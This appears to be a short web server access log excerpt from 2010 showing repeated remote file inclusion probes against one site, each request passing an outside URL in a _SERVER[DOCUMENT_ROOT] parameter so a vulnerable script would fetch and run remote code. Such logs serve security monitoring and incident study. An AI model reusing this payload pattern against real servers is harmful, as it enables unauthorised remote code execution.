87.106.132.3 - - [01/Mar/2010:00:24:49 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:24:49 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:24:52 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:24:52 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:24:52 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
